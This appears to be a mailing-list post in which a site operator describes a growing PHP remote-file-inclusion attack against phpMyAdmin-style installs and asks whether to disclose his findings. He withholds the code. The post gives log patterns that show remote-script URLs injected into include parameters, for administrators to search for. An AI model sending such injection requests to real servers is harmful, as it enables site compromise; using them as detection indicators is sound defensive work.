I have been asked to provide updates to the list when/if I got any
progress on this.
I have. Not sure what to do next however and if the finding should be
put out fully. I don't know as i never done that before.
But the attack keep growing and is now reaching 300,000 logged source
IP's. I finds way to work around it and I was also able to find a
variation on the theme of how this get propagated anyway.
I just trace back a new one as well that just started and will/are
attacking many and spreading using possible hole in MyPHPAdmin. This new
one pretend to be from the new Windows OS using the new upcoming
Firefox/1.6. I didn't find a way to stop it from attacking, however it
can't inject itself in as for this your PHP codes needs to allow it
obviously and you need MyPHPAdmin and variation of it install like this
new one discover just a few eeks ago:
http://www.securityfocus.com/bid/18763/info
All variations on that.
I have found a few sources of it, the code use to start it, the code to
inject it as well as the PERL code that will also run on the box to
start the attack and propagate itself on other.
At this point I am not sure if I should do anything else with this or
not. I am reluctant to post the full code obviously as this would
promote the creation of many more variations of it, but at the same time
I fell it should be know so that users can do something to protect
themselves and others.
But let me say that should you have MyPHPAdmin install, or others like
it, may be you should check your logs and look for things like:
/Include/lib.inc.php3?Include=http://www.xxx.xx/xxxx/xxxxxxxxx_c/remote.txt
or
/Include/Header.Inc.PHP?Include=http://www.xxx.xx/xxxx/xxxxxxxxx_c/remote.txt
or variation on that to be sure you didn't have anyone that got into
your system via PHP badly written code if you didn't do sanity check on
users pass variable to you, or worst on installed of bad library of some
packages.
So, of it is already old version that existed in 2000, but look like
there is a new recurring variation of it coming out.
As to how to work around the issue. Well, not that you can stop it, but
how you definitely can minimize the impact of it is with the
understanding that the calling offending party will attack you with GET
to your site, try to inject itself to you. But if it can't do this, then
it will simply with a different variation try to flood your site via the
GET.
However, it's possible to minimize that too. Again, I can put the howto
public but at the same time it will tell how to increase the effect of
the attack as it's possible to make it much more efficient and what I
came up as a defense for it would be useless, So, again, I am not sure
how to address of offer the suggestion I put in place with success so
far. I am running it real well for almost three weeks now without any
problem or impact to the sites.
Again, what should I do? In the end there is no magic to it and it's
really simple as well, but working around it is real simple too.
Also in this version, the use of Google and altavista doesn't help.
I don't think the idea of this type of attack is new at all, but
obviously there is new holes now as very new variations are coming out
quickly and they all pretend to be from very new OS and browsers as well.
So, any suggestions of what should be done next is very welcome as well
if anything.
I am obviously in very green territory here.
Best,
Daniel
